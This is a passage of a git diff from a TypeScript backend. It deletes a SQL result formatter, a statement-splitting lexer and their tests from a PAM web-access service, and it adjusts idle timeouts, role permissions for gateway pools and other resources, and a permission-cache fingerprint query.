dataTypeID: builtins.TEXT } - ], - rows: [{ id: 1, name: null }] - }); - - expect(result).toContain("(1 row)"); - }); - - it("zero rows with fields", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 0, - fields: [ - { name: "id", dataTypeID: builtins.INT4 }, - { name: "name", dataTypeID: builtins.TEXT } - ], - rows: [] - }); - - expect(result).toContain("id"); - expect(result).toContain("name"); - expect(result).toContain("(0 rows)"); - }); - - it("single row uses singular footer", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "val", dataTypeID: builtins.INT4 }], - rows: [{ val: 42 }] - }); - - expect(result).toContain("(1 row)"); - expect(result).not.toContain("(1 rows)"); - }); - - it("column width matches longest value", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "x", dataTypeID: builtins.TEXT }], - rows: [{ x: "longvalue" }] - }); - - // The separator should be at least as wide as "longvalue" - const lines = result.split("\n"); - const separator = lines[1]; - // "longvalue" is 9 chars, column should be at least 9 + 2 (padding) = 11 - expect(separator.length).toBeGreaterThanOrEqual(11); - }); - - it("formats Date values as ISO-like timestamps", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "created_at", dataTypeID: builtins.TIMESTAMPTZ }], - rows: [{ created_at: new Date("2026-02-05T19:04:52.000Z") }] - }); - - expect(result).toContain("2026-02-05 19:04:52"); - expect(result).not.toContain("GMT"); - expect(result).not.toContain("Coordinated Universal Time"); - }); - - it("formats raw string timestamps as-is", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "ts", dataTypeID: builtins.TIMESTAMPTZ }], - rows: [{ ts: "2026-02-05 19:04:52+00" }] - }); - - expect(result).toContain("2026-02-05 19:04:52+00"); - }); - - it("formats Buffer values as hex", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "data", dataTypeID: builtins.BYTEA }], - rows: [{ data: Buffer.from([0xde, 0xad, 0xbe, 0xef]) }] - }); - - expect(result).toContain("\\xdeadbeef"); - }); - - it("formats Array values with braces", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 1, - fields: [{ name: "tags", dataTypeID: 1009 }], - rows: [{ tags: ["a", "b", "c"] }] - }); - - expect(result).toContain("{a,b,c}"); - }); - - it("returns empty string for no fields", () => { - const result = formatTable({ - command: "SELECT", - rowCount: 0, - fields: [], - rows: [] - }); - - expect(result).toBe(""); - }); -}); - -describe("formatCommandResult", () => { - it("INSERT with row count", () => { - const result = formatCommandResult({ - command: "INSERT", - rowCount: 3, - fields: [], - rows: [] - }); - expect(result).toBe("INSERT 0 3\n"); - }); - - it("CREATE TABLE", () => { - const result = formatCommandResult({ - command: "CREATE TABLE", - rowCount: null, - fields: [], - rows: [] - }); - expect(result).toBe("CREATE TABLE\n"); - }); - - it("BEGIN", () => { - const result = formatCommandResult({ - command: "BEGIN", - rowCount: null, - fields: [], - rows: [] - }); - expect(result).toBe("BEGIN\n"); - }); - - it("UPDATE with row count", () => { - const result = formatCommandResult({ - command: "UPDATE", - rowCount: 5, - fields: [], - rows: [] - }); - expect(result).toBe("UPDATE 5\n"); - }); - - it("DELETE with zero rows", () => { - const result = formatCommandResult({ - command: "DELETE", - rowCount: 0, - fields: [], - rows: [] - }); - expect(result).toBe("DELETE\n"); - }); -}); - -describe("formatError", () => { - it("formats pg error with message", () => { - const result = formatError({ message: 'relation "nonexistent" does not exist' }); - expect(result).toBe('ERROR: relation "nonexistent" does not exist\n'); - }); - - it("includes DETAIL if present", () => { - const result = formatError({ - message: "duplicate key violation", - detail: "Key (id)=(1) already exists." - }); - expect(result).toContain("ERROR: duplicate key violation\n"); - expect(result).toContain("DETAIL: Key (id)=(1) already exists.\n"); - }); - - it("includes HINT if present", () => { - const result = formatError({ - message: "column does not exist", - hint: 'Perhaps you meant to reference the column "user"."name".' - }); - expect(result).toContain("ERROR: column does not exist\n"); - expect(result).toContain("HINT:"); - }); - - it("handles non-pg errors", () => { - const result = formatError("something went wrong"); - expect(result).toBe("ERROR: something went wrong\n"); - }); - - it("handles null/undefined", () => { - const result = formatError(null); - expect(result).toContain("ERROR:"); - }); -}); diff --git a/backend/src/ee/services/pam-web-access/pam-web-access-sql-formatter.ts b/backend/src/ee/services/pam-web-access/pam-web-access-sql-formatter.ts deleted file mode 100644 index f776b8b53f3..00000000000 --- a/backend/src/ee/services/pam-web-access/pam-web-access-sql-formatter.ts +++ /dev/null @@ -1,119 +0,0 @@ -import { builtins } from "pg-types"; - -// PostgreSQL numeric type OIDs for right-alignment -const NUMERIC_TYPE_IDS = new Set([ - builtins.INT8, - builtins.INT2, - builtins.INT4, - builtins.OID, - builtins.FLOAT4, - builtins.FLOAT8, - builtins.MONEY, - builtins.NUMERIC -]); - -type TQueryResult = { - command: string; - rowCount: number | null; - fields: Array<{ name: string; dataTypeID: number }>; - rows: Record[]; -}; - -/** - * Formats a SELECT query result as a psql-style ASCII table. - */ -export const formatTable = (result: TQueryResult): string => { - const { fields, rows } = result; - - if (!fields || fields.length === 0) { - return ""; - } - - // Convert all values to display strings. - // With raw type parsers all values are already strings, but handle - // Date/Buffer/Array defensively in case parsed types slip through. - const displayRows = rows.map((row) => - fields.map((field) => { - const val = row[field.name]; - if (val === null || val === undefined) return ""; - if (val instanceof Date) return val.toISOString().replace("T", " ").replace("Z", "+00"); - if (Buffer.isBuffer(val)) return `\\x${val.toString("hex")}`; - if (Array.isArray(val)) return `{${val.map((v) => String(v ?? "NULL")).join(",")}}`; - return String(val); - }) - ); - - // Calculate column widths: max of header length and all value lengths - const colWidths = fields.map((field, colIdx) => { - let maxLen = field.name.length; - for (const row of displayRows) { - if (row[colIdx].length > maxLen) { - maxLen = row[colIdx].length; - } - } - return maxLen; - }); - - // Determine alignment per column - const isNumeric = fields.map((field) => NUMERIC_TYPE_IDS.has(field.dataTypeID)); - - // Build header row - const headerCells = fields.map((field, i) => ` ${field.name.padEnd(colWidths[i])} `); - const headerLine = headerCells.join("|"); - - // Build separator row - const separatorCells = colWidths.map((w) => "-".repeat(w + 2)); - const separatorLine = separatorCells.join("+"); - - // Build data rows - const dataLines = displayRows.map((row) => { - const cells = row.map((val, i) => { - const padded = isNumeric[i] ? val.padStart(colWidths[i]) : val.padEnd(colWidths[i]); - return ` ${padded} `; - }); - return cells.join("|"); - }); - - // Footer - const rowCount = rows.length; - const footer = `(${rowCount} ${rowCount === 1 ? "row" : "rows"})`; - - // Assemble - const parts = [headerLine, separatorLine, ...dataLines, footer, ""]; - return parts.join("\n"); -}; - -/** - * Formats a DML/DDL command result (e.g. "INSERT 0 3", "CREATE TABLE", "BEGIN"). - */ -export const formatCommandResult = (result: TQueryResult): string => { - const { command, rowCount } = result; - if (rowCount != null && rowCount > 0) { - // INSERT returns "INSERT 0 " in psql - if (command === "INSERT") { - return `INSERT 0 ${rowCount}\n`; - } - // UPDATE, DELETE return " " - return `${command} ${rowCount}\n`; - } - return `${command}\n`; -}; - -/** - * Formats a PostgreSQL error in psql style. - */ -export const formatError = (err: unknown): string => { - if (err && typeof err === "object") { - const pgErr = err as { message?: string; detail?: string; hint?: string; severity?: string }; - const parts: string[] = []; - parts.push(`ERROR: ${pgErr.message ?? "Unknown error"}\n`); - if (pgErr.detail) { - parts.push(`DETAIL: ${pgErr.detail}\n`); - } - if (pgErr.hint) { - parts.push(`HINT: ${pgErr.hint}\n`); - } - return parts.join(""); - } - return `ERROR: ${String(err)}\n`; -}; diff --git a/backend/src/ee/services/pam-web-access/pam-web-access-sql-lexer.test.ts b/backend/src/ee/services/pam-web-access/pam-web-access-sql-lexer.test.ts deleted file mode 100644 index 95f827f02c7..00000000000 --- a/backend/src/ee/services/pam-web-access/pam-web-access-sql-lexer.test.ts +++ /dev/null @@ -1,138 +0,0 @@ -import { describe, expect, it } from "vitest"; - -import { splitStatements } from "./pam-web-access-sql-lexer"; - -describe("splitStatements", () => { - // Basic cases - it("single complete statement", () => { - const result = splitStatements("SELECT 1;"); - expect(result.complete).toEqual(["SELECT 1"]); - expect(result.remainder).toBe(""); - }); - - it("multiple statements on one line", () => { - const result = splitStatements("SELECT 1; SELECT 2;"); - expect(result.complete).toEqual(["SELECT 1", " SELECT 2"]); - expect(result.remainder).toBe(""); - }); - - it("incomplete statement (no ;)", () => { - const result = splitStatements("SELECT 1"); - expect(result.complete).toEqual([]); - expect(result.remainder).toBe("SELECT 1"); - }); - - it("mixed complete + incomplete", () => { - const result = splitStatements("SELECT 1; SELECT"); - expect(result.complete).toEqual(["SELECT 1"]); - expect(result.remainder).toBe(" SELECT"); - }); - - it("empty statements", () => { - const result = splitStatements(";;;"); - expect(result.complete).toEqual(["", "", ""]); - expect(result.remainder).toBe(""); - }); - - it("multi-line statement", () => { - const result = splitStatements("SELECT *\nFROM users;"); - expect(result.complete).toEqual(["SELECT *\nFROM users"]); - expect(result.remainder).toBe(""); - }); - - // Quoting - it("semicolon inside single quotes", () => { - const result = splitStatements("SELECT 'a;b';"); - expect(result.complete).toEqual(["SELECT 'a;b'"]); - expect(result.remainder).toBe(""); - }); - - it("escaped single quote", () => { - const result = splitStatements("SELECT 'it''s';"); - expect(result.complete).toEqual(["SELECT 'it''s'"]); - expect(result.remainder).toBe(""); - }); - - it("dollar-quoted string", () => { - const result = splitStatements("SELECT $$a;b$$;"); - expect(result.complete).toEqual(["SELECT $$a;b$$"]); - expect(result.remainder).toBe(""); - }); - - it("dollar-quoted with tag", () => { - const result = splitStatements("SELECT $fn$a;b$fn$;"); - expect(result.complete).toEqual(["SELECT $fn$a;b$fn$"]); - expect(result.remainder).toBe(""); - }); - - it("dollar sign not a quote (positional param)", () => { - const result = splitStatements("SELECT $1;"); - expect(result.complete).toEqual(["SELECT $1"]); - expect(result.remainder).toBe(""); - }); - - // Comments - it("line comment with semicolon", () => { - const result = splitStatements("SELECT 1; -- comment;\nSELECT 2;"); - expect(result.complete).toHaveLength(2); - expect(result.complete[0]).toBe("SELECT 1"); - expect(result.complete[1].trim()).toContain("SELECT 2"); - }); - - it("block comment with semicolon", () => { - const result = splitStatements("SELECT /* ; */ 1;"); - expect(result.complete).toEqual(["SELECT /* ; */ 1"]); - expect(result.remainder).toBe(""); - }); - - it("nested block comments", () => { - const result = splitStatements("SELECT /* /* ; */ */ 1;"); - expect(result.complete).toEqual(["SELECT /* /* ; */ */ 1"]); - expect(result.remainder).toBe(""); - }); - - // Edge cases - it("empty input", () => { - const result = splitStatements(""); - expect(result.complete).toEqual([]); - expect(result.remainder).toBe(""); - }); - - it("only whitespace", () => { - const result = splitStatements(" "); - expect(result.complete).toEqual([]); - expect(result.remainder).toBe(" "); - }); - - it("only semicolons", () => { - const result = splitStatements(";;;"); - expect(result.complete).toEqual(["", "", ""]); - expect(result.remainder).toBe(""); - }); - - it("statement after line comment", () => { - const result = splitStatements("-- comment\nSELECT 1;"); - expect(result.complete).toHaveLength(1); - expect(result.complete[0]).toContain("SELECT 1"); - }); - - it("unclosed single quote keeps everything in remainder", () => { - const result = splitStatements("SELECT 'unclosed;"); - expect(result.complete).toEqual([]); - expect(result.remainder).toBe("SELECT 'unclosed;"); - }); - - it("unclosed block comment keeps everything in remainder", () => { - const result = splitStatements("SELECT /* unclosed ;"); - expect(result.complete).toEqual([]); - expect(result.remainder).toBe("SELECT /* unclosed ;"); - }); - - it("CREATE FUNCTION with dollar-quoted body", () => { - const sql = `CREATE FUNCTION test() RETURNS void AS $$ BEGIN PERFORM 1; END; $$ LANGUAGE plpgsql;`; - const result = splitStatements(sql); - expect(result.complete).toHaveLength(1); - expect(result.complete[0]).toContain("PERFORM 1;"); - expect(result.remainder).toBe(""); - }); -}); diff --git a/backend/src/ee/services/pam-web-access/pam-web-access-sql-lexer.ts b/backend/src/ee/services/pam-web-access/pam-web-access-sql-lexer.ts deleted file mode 100644 index 792e2022a7f..00000000000 --- a/backend/src/ee/services/pam-web-access/pam-web-access-sql-lexer.ts +++ /dev/null @@ -1,169 +0,0 @@ -type TSplitResult = { - complete: string[]; - remainder: string; -}; - -enum LexerState { - Normal = "normal", - SingleQuote = "single_quote", - DollarQuote = "dollar_quote", - LineComment = "line_comment", - BlockComment = "block_comment" -} - -/** - * Tries to parse a dollar-quote tag starting at position i. - * Returns the full tag (e.g. "$$" or "$fn$") if found, null otherwise. - */ -const tryParseDollarTag = (sql: string, i: number): string | null => { - // Must start with $ - if (sql[i] !== "$") return null; - - // Check for $$ (empty tag) - if (i + 1 < sql.length && sql[i + 1] === "$") { - return "$$"; - } - - // Check for $identifier$ pattern - // Identifier must start with [A-Za-z_\x80-\xff] - const startChar = i + 1 < sql.length ? sql.charCodeAt(i + 1) : 0; - const isValidStart = - (startChar >= 65 && startChar <= 90) || // A-Z - (startChar >= 97 && startChar <= 122) || // a-z - startChar === 95 || // _ - startChar >= 128; // \x80-\xff - - if (!isValidStart) return null; - - // Scan for the rest of the identifier + closing $ - let j = i + 2; - while (j < sql.length) { - const code = sql.charCodeAt(j); - const isValidContinue = - (code >= 65 && code <= 90) || // A-Z - (code >= 97 && code <= 122) || // a-z - (code >= 48 && code <= 57) || // 0-9 - code === 95 || // _ - code >= 128; // \x80-\xff - - if (code === 36) { - // Found closing $ - return sql.substring(i, j + 1); - } - if (!isValidContinue) { - return null; - } - j += 1; - } - - return null; -}; - -/** - * Splits a SQL string into individual statements by detecting semicolons - * that are actual statement boundaries (not inside strings, comments, etc.). - * - * Returns complete statements (terminated by ;) and any remaining text. - */ -export const splitStatements = (sql: string): TSplitResult => { - const complete: string[] = []; - let buffer = ""; - let state = LexerState.Normal; - let dollarTag = ""; - let blockDepth = 0; - let i = 0; - - while (i < sql.length) { - const ch = sql[i]; - const next = i + 1 < sql.length ? sql[i + 1] : ""; - - switch (state) { - case LexerState.Normal: - if (ch === ";") { - complete.push(buffer); - buffer = ""; - } else if (ch === "'") { - buffer += ch; - state = LexerState.SingleQuote; - } else if (ch === "$") { - // Check for dollar-quote tag: $$ or $identifier$ - const tag = tryParseDollarTag(sql, i); - if (tag !== null) { - buffer += tag; - dollarTag = tag; - state = LexerState.DollarQuote; - i += tag.length - 1; // -1 because the loop will i++ - } else { - buffer += ch; - } - } else if (ch === "-" && next === "-") { - buffer += "--"; - state = LexerState.LineComment; - i += 1; - } else if (ch === "/" && next === "*") { - buffer += "/*"; - state = LexerState.BlockComment; - blockDepth = 1; - i += 1; - } else { - buffer += ch; - } - break; - - case LexerState.SingleQuote: - if (ch === "'" && next === "'") { - // Escaped single quote - buffer += "''"; - i += 1; - } else if (ch === "'") { - buffer += ch; - state = LexerState.Normal; - } else { - buffer += ch; - } - break; - - case LexerState.DollarQuote: - // Check if we've hit the closing dollar tag - if (ch === "$" && sql.substring(i, i + dollarTag.length) === dollarTag) { - buffer += dollarTag; - i += dollarTag.length - 1; - state = LexerState.Normal; - } else { - buffer += ch; - } - break; - - case LexerState.LineComment: - buffer += ch; - if (ch === "\n") { - state = LexerState.Normal; - } - break; - - case LexerState.BlockComment: - if (ch === "/" && next === "*") { - buffer += "/*"; - blockDepth += 1; - i += 1; - } else if (ch === "*" && next === "/") { - buffer += "*/"; - blockDepth -= 1; - if (blockDepth === 0) { - state = LexerState.Normal; - } - i += 1; - } else { - buffer += ch; - } - break; - - default: - buffer += ch; - } - - i += 1; - } - - return { complete, remainder: buffer }; -}; diff --git a/backend/src/ee/services/pam-web-access/pam-web-access-types.ts b/backend/src/ee/services/pam-web-access/pam-web-access-types.ts index ee7bf4182b0..3e9f487afe7 100644 --- a/backend/src/ee/services/pam-web-access/pam-web-access-types.ts +++ b/backend/src/ee/services/pam-web-access/pam-web-access-types.ts @@ -43,8 +43,10 @@ export const MAX_WEB_SESSIONS_PER_USER = 5; // WebSocket ping interval (ms) β€” keeps ALB from killing idle connections (default 60s timeout) export const WS_PING_INTERVAL_MS = 30000; -// Idle timeout (ms) β€” auto-close sessions with no user input/control messages -export const WS_IDLE_TIMEOUT_MS = 5 * 60 * 1000; +// Idle timeout (ms) β€” auto-close sessions with no inbound WS traffic. The FE +// sends an `activity` heartbeat while its browser tab is visible, so this fires +// only when the tab has been hidden/backgrounded for the full window. +export const WS_IDLE_TIMEOUT_MS = 10 * 60 * 1000; export type TSessionContext = { socket: WebSocket; @@ -70,4 +72,5 @@ export type TIssueWebSocketTicketDTO = { actorName: string; auditLogInfo: AuditLogInfo; mfaSessionId?: string; + reason?: string; }; diff --git a/backend/src/ee/services/permission/default-roles.ts b/backend/src/ee/services/permission/default-roles.ts index 797c569af32..d0004d7a464 100644 --- a/backend/src/ee/services/permission/default-roles.ts +++ b/backend/src/ee/services/permission/default-roles.ts @@ -16,6 +16,7 @@ import { ProjectPermissionDynamicSecretActions, ProjectPermissionGroupActions, ProjectPermissionIdentityActions, + ProjectPermissionInsightsActions, ProjectPermissionKmipActions, ProjectPermissionMcpEndpointActions, ProjectPermissionMemberActions, @@ -58,12 +59,14 @@ const buildAdminPermissionRules = () => { ProjectPermissionSub.IpAllowList, ProjectPermissionSub.PkiAlerts, ProjectPermissionSub.PkiCollections, + ProjectPermissionSub.CertificateInventoryViews, ProjectPermissionSub.SshCertificateAuthorities, ProjectPermissionSub.SshCertificates, ProjectPermissionSub.SshCertificateTemplates, ProjectPermissionSub.SshHostGroups, ProjectPermissionSub.PamFolders, ProjectPermissionSub.PamResources, + ProjectPermissionSub.PamDomains, ProjectPermissionSub.McpServers, ProjectPermissionSub.McpActivityLogs ].forEach((el) => { @@ -448,6 +451,8 @@ const buildAdminPermissionRules = () => { can([ProjectPermissionSecretApprovalRequestActions.Read], ProjectPermissionSub.SecretApprovalRequest); + can([ProjectPermissionInsightsActions.Read], ProjectPermissionSub.Insights); + return rules; }; @@ -610,6 +615,15 @@ const buildMemberPermissionRules = () => { can([ProjectPermissionActions.Read], ProjectPermissionSub.PkiAlerts); can([ProjectPermissionActions.Read], ProjectPermissionSub.PkiCollections); + can( + [ + ProjectPermissionActions.Read, + ProjectPermissionActions.Create, + ProjectPermissionActions.Edit, + ProjectPermissionActions.Delete + ], + ProjectPermissionSub.CertificateInventoryViews + ); can([ProjectPermissionActions.Read], ProjectPermissionSub.SshCertificates); can([ProjectPermissionActions.Create], ProjectPermissionSub.SshCertificates); @@ -698,6 +712,8 @@ const buildMemberPermissionRules = () => { can([ProjectPermissionActions.Read], ProjectPermissionSub.PamResources); + can([ProjectPermissionActions.Read], ProjectPermissionSub.PamDomains); + can( [ProjectPermissionPamAccountActions.Access, ProjectPermissionPamAccountActions.Read], ProjectPermissionSub.PamAccounts @@ -743,6 +759,7 @@ const buildViewerPermissionRules = () => { can(ProjectPermissionActions.Read, ProjectPermissionSub.IpAllowList); can(ProjectPermissionCertificateAuthorityActions.Read, ProjectPermissionSub.CertificateAuthorities); can(ProjectPermissionCertificateActions.Read, ProjectPermissionSub.Certificates); + can([ProjectPermissionActions.Read], ProjectPermissionSub.CertificateInventoryViews); can(ProjectPermissionPkiTemplateActions.Read, ProjectPermissionSub.CertificateTemplates); can(ProjectPermissionCertificatePolicyActions.Read, ProjectPermissionSub.CertificatePolicies); can(ProjectPermissionCmekActions.Read, ProjectPermissionSub.Cmek); @@ -782,6 +799,8 @@ const buildViewerPermissionRules = () => { can([ProjectPermissionActions.Read], ProjectPermissionSub.PamResources); + can([ProjectPermissionActions.Read], ProjectPermissionSub.PamDomains); + can([ProjectPermissionPamAccountActions.Read], ProjectPermissionSub.PamAccounts); can([ProjectPermissionPamAccountPolicyActions.Read], ProjectPermissionSub.PamAccountPolicies); diff --git a/backend/src/ee/services/permission/org-permission.ts b/backend/src/ee/services/permission/org-permission.ts index ceb2e9683fa..b28bc990c79 100644 --- a/backend/src/ee/services/permission/org-permission.ts +++ b/backend/src/ee/services/permission/org-permission.ts @@ -74,6 +74,14 @@ export enum OrgPermissionGatewayActions { AttachGateways = "attach-gateways" } +export enum OrgPermissionGatewayPoolActions { + CreateGatewayPools = "create-gateway-pools", + ListGatewayPools = "list-gateway-pools", + EditGatewayPools = "edit-gateway-pools", + DeleteGatewayPools = "delete-gateway-pools", + AttachGatewayPools = "attach-gateway-pools" +} + export enum OrgPermissionRelayActions { CreateRelays = "create-relays", ListRelays = "list-relays", @@ -141,6 +149,7 @@ export enum OrgPermissionSubjects { AppConnections = "app-connections", Kmip = "kmip", Gateway = "gateway", + GatewayPool = "gateway-pool", Relay = "relay", SecretShare = "secret-share", SubOrganization = "sub-organization", @@ -172,6 +181,7 @@ export type OrgPermissionSet = | [OrgPermissionAuditLogsActions, OrgPermissionSubjects.AuditLogs] | [OrgPermissionActions, OrgPermissionSubjects.ProjectTemplates] | [OrgPermissionGatewayActions, OrgPermissionSubjects.Gateway] + | [OrgPermissionGatewayPoolActions, OrgPermissionSubjects.GatewayPool] | [OrgPermissionRelayActions, OrgPermissionSubjects.Relay] | [ OrgPermissionAppConnectionActions, @@ -330,6 +340,12 @@ export const OrgPermissionSchema = z.discriminatedUnion("subject", [ "Describe what action an entity can take." ) }), + z.object({ + subject: z.literal(OrgPermissionSubjects.GatewayPool).describe("The entity this permission pertains to."), + action: CASL_ACTION_SCHEMA_NATIVE_ENUM(OrgPermissionGatewayPoolActions).describe( + "Describe what action an entity can take." + ) + }), z.object({ subject: z.literal(OrgPermissionSubjects.Relay).describe("The entity this permission pertains to."), action: CASL_ACTION_SCHEMA_NATIVE_ENUM(OrgPermissionRelayActions).describe( @@ -456,6 +472,12 @@ const buildAdminPermission = () => { can(OrgPermissionGatewayActions.DeleteGateways, OrgPermissionSubjects.Gateway); can(OrgPermissionGatewayActions.AttachGateways, OrgPermissionSubjects.Gateway); + can(OrgPermissionGatewayPoolActions.ListGatewayPools, OrgPermissionSubjects.GatewayPool); + can(OrgPermissionGatewayPoolActions.CreateGatewayPools, OrgPermissionSubjects.GatewayPool); + can(OrgPermissionGatewayPoolActions.EditGatewayPools, OrgPermissionSubjects.GatewayPool); + can(OrgPermissionGatewayPoolActions.DeleteGatewayPools, OrgPermissionSubjects.GatewayPool); + can(OrgPermissionGatewayPoolActions.AttachGatewayPools, OrgPermissionSubjects.GatewayPool); + can(OrgPermissionRelayActions.ListRelays, OrgPermissionSubjects.Relay); can(OrgPermissionRelayActions.CreateRelays, OrgPermissionSubjects.Relay); can(OrgPermissionRelayActions.EditRelays, OrgPermissionSubjects.Relay); @@ -526,6 +548,10 @@ const buildMemberPermission = () => { can(OrgPermissionGatewayActions.CreateGateways, OrgPermissionSubjects.Gateway); can(OrgPermissionGatewayActions.AttachGateways, OrgPermissionSubjects.Gateway); + can(OrgPermissionGatewayPoolActions.ListGatewayPools, OrgPermissionSubjects.GatewayPool); + can(OrgPermissionGatewayPoolActions.CreateGatewayPools, OrgPermissionSubjects.GatewayPool); + can(OrgPermissionGatewayPoolActions.AttachGatewayPools, OrgPermissionSubjects.GatewayPool); + can(OrgPermissionRelayActions.ListRelays, OrgPermissionSubjects.Relay); can(OrgPermissionRelayActions.CreateRelays, OrgPermissionSubjects.Relay); can(OrgPermissionRelayActions.EditRelays, OrgPermissionSubjects.Relay); diff --git a/backend/src/ee/services/permission/permission-dal.ts b/backend/src/ee/services/permission/permission-dal.ts index a2994711880..09b0b71e36b 100644 --- a/backend/src/ee/services/permission/permission-dal.ts +++ b/backend/src/ee/services/permission/permission-dal.ts @@ -811,6 +811,8 @@ export const permissionDALFactory = (db: TDbClient): TPermissionDALFactory => { // Lightweight permission fingerprint for ETag validation. // Same tables/joins/WHERE as getPermission but selects only IDs + timestamps, // then hashes in JS. The CASE expressions make the hash flip at temporary access expiry. + // Includes both project-scoped AND org-scoped memberships so that org-level + // permission changes (e.g. SSO bypass grant/revoke) also invalidate the cache. const getPermissionFingerprint: TPermissionDALFactory["getPermissionFingerprint"] = async ({ projectId, orgId, @@ -846,9 +848,25 @@ export const permissionDALFactory = (db: TDbClient): TPermissionDALFactory => { `${TableName.AdditionalPrivilege}.projectId` ); }) + .leftJoin(TableName.IdentityMetadata, (qb) => { + if (actorType === ActorType.IDENTITY) { + qb.on(`${TableName.IdentityMetadata}.identityId`, `${TableName.Membership}.actorIdentityId`); + } else { + void qb + .on(`${TableName.IdentityMetadata}.userId`, db.raw("?", [actorId])) + .andOn(`${TableName.Membership}.scopeOrgId`, `${TableName.IdentityMetadata}.orgId`); + } + }) .where(`${TableName.Membership}.scopeOrgId`, orgId) - .where(`${TableName.Membership}.scope`, AccessScope.Project) - .where(`${TableName.Membership}.scopeProjectId`, projectId) + .where((scopeQb) => { + void scopeQb + .where((inner) => { + void inner + .where(`${TableName.Membership}.scope`, AccessScope.Project) + .where(`${TableName.Membership}.scopeProjectId`, projectId); + }) + .orWhere(`${TableName.Membership}.scope`, AccessScope.Organization); + }) .where((qb) => { const directCol = actorType === ActorType.USER @@ -864,6 +882,8 @@ export const permissionDALFactory = (db: TDbClient): TPermissionDALFactory => { db.ref("updatedAt").withSchema(TableName.Role).as("crUp"), db.ref("id").withSchema(TableName.AdditionalPrivilege).as("pId"), db.ref("updatedAt").withSchema(TableName.AdditionalPrivilege).as("pUp"), + db.ref("id").withSchema(TableName.IdentityMetadata).as("imId"), + db.ref("updatedAt").withSchema(TableName.IdentityMetadata).as("imUp"), db.raw( `CASE WHEN "${TableName.MembershipRole}"."isTemporary" AND NOW() >= "${TableName.MembershipRole}"."temporaryAccessEndTime" THEN true ELSE false END AS "rExp"` ), diff --git a/backend/src/ee/services/permission/permission-service-types.ts b/backend/src/ee/services/permission/permission-service-types.ts index a74ad2626bf..00f11187292 100644 --- a/backend/src/ee/services/permission/permission-service-types.ts +++ b/backend/src/ee/services/permission/permission-service-types.ts @@ -1,6 +1,5 @@ import { MongoAbility } from "@casl/ability"; import { MongoQuery } from "@ucast/mongo2js"; -import { Knex } from "knex"; import { ActionProjectType, OrganizationActionScope, TMemberships } from "@app/db/schemas"; import { ActorAuthMethod, ActorType } from "@app/services/auth/auth-type"; @@ -126,5 +125,4 @@ export type TPermissionServiceFactory = { projectId: string; checkPermissions: ProjectPermissionSet; }) => Promise; - invalidateProjectPermissionCache: (projectId: string, tx?: Knex) => Promise; }; diff --git a/backend/src/ee/services/permission/permission-service.ts b/backend/src/ee/services/permission/permission-service.ts index 8c3e849267c..7f8fe8789f7 100644 --- a/backend/src/ee/services/permission/permission-service.ts +++ b/backend/src/ee/services/permission/permission-service.ts @@ -2,7 +2,6 @@ import { createMongoAbility, MongoAbility, RawRuleOf } from "@casl/ability"; import { PackRule, unpackRules } from "@casl/ability/extra"; import { requestContext } from "@fastify/request-context"; import handlebars from "handlebars"; -import { Knex } from "knex"; import { AccessScope, @@ -22,6 +21,7 @@ import { sshHostBootstrapPermissions } from "@app/ee/services/permission/default-roles"; import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; +import { withCacheFingerprint } from "@app/lib/cache/with-cache"; import { conditionsMatcher } from "@app/lib/casl"; import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; import { objectify } from "@app/lib/fn"; @@ -167,69 +167,6 @@ export const permissionServiceFactory = ({ keyStore, roleDAL }: TPermissionServiceFactoryDep): TPermissionServiceFactory => { - const invalidateProjectPermissionCache = async (projectId: string, tx?: Knex) => { - const projectPermissionDalVersionKey = KeyStorePrefixes.ProjectPermissionDalVersion(projectId); - await keyStore.pgIncrementBy(projectPermissionDalVersionKey, { - incr: 1, - tx, - expiry: KeyStoreTtls.ProjectPermissionDalVersionTtl - }); - }; - - // akhilmdhh: will bring this up later - // const calculateProjectPermissionTtl = (membership: unknown): number => { - // const now = new Date(); - // let minTtl = KeyStoreTtls.ProjectPermissionCacheInSeconds; - // - // const getMinEndTime = (items: Array<{ temporaryAccessEndTime?: Date | null; isTemporary?: boolean }>) => { - // return items - // .filter((item) => item.isTemporary && item.temporaryAccessEndTime) - // .map((item) => item.temporaryAccessEndTime!) - // .filter((endTime) => endTime > now) - // .reduce((min, endTime) => (!min || endTime < min ? endTime : min), null as Date | null); - // }; - // - // const roleTimes: Date[] = []; - // const additionalPrivilegeTimes: Date[] = []; - // - // if ( - // membership && - // typeof membership === "object" && - // "roles" in membership && - // Array.isArray((membership as Record).roles) - // ) { - // const roles = (membership as Record).roles as Array<{ - // temporaryAccessEndTime?: Date | null; - // isTemporary?: boolean; - // }>; - // const minRoleEndTime = getMinEndTime(roles); - // if (minRoleEndTime) roleTimes.push(minRoleEndTime); - // } - // - // if ( - // membership && - // typeof membership === "object" && - // "additionalPrivileges" in membership && - // Array.isArray((membership as Record).additionalPrivileges) - // ) { - // const additionalPrivileges = (membership as Record).additionalPrivileges as Array<{ - // temporaryAccessEndTime?: Date | null; - // isTemporary?: boolean; - // }>; - // const minAdditionalEndTime = getMinEndTime(additionalPrivileges); - // if (minAdditionalEndTime) additionalPrivilegeTimes.push(minAdditionalEndTime); - // } - // - // const allEndTimes = [...roleTimes, ...additionalPrivilegeTimes]; - // if (allEndTimes.length > 0) { - // const nearestEndTime = allEndTimes.reduce((min, endTime) => (!min || endTime < min ? endTime : min)); - // const timeUntilExpiry = Math.floor((nearestEndTime.getTime() - now.getTime()) / 1000); - // minTtl = Math.min(minTtl, Math.max(1, timeUntilExpiry)); - // } - // - // return minTtl; - // }; - const getOrgPermission: TPermissionServiceFactory["getOrgPermission"] = async ({ actor, actorId, @@ -329,7 +266,9 @@ export const permissionServiceFactory = ({ const serviceToken = await serviceTokenDAL.findById(serviceTokenId); if (!serviceToken) throw new NotFoundError({ message: `Service token with ID '${serviceTokenId}' not found` }); - const serviceTokenProject = await projectDAL.findById(serviceToken.projectId); + const serviceTokenProject = await requestMemoize(requestMemoKeys.projectFindById(serviceToken.projectId), () => + projectDAL.findById(serviceToken.projectId) + ); if (!serviceTokenProject) throw new BadRequestError({ message: "Service token not linked to a project" }); @@ -360,6 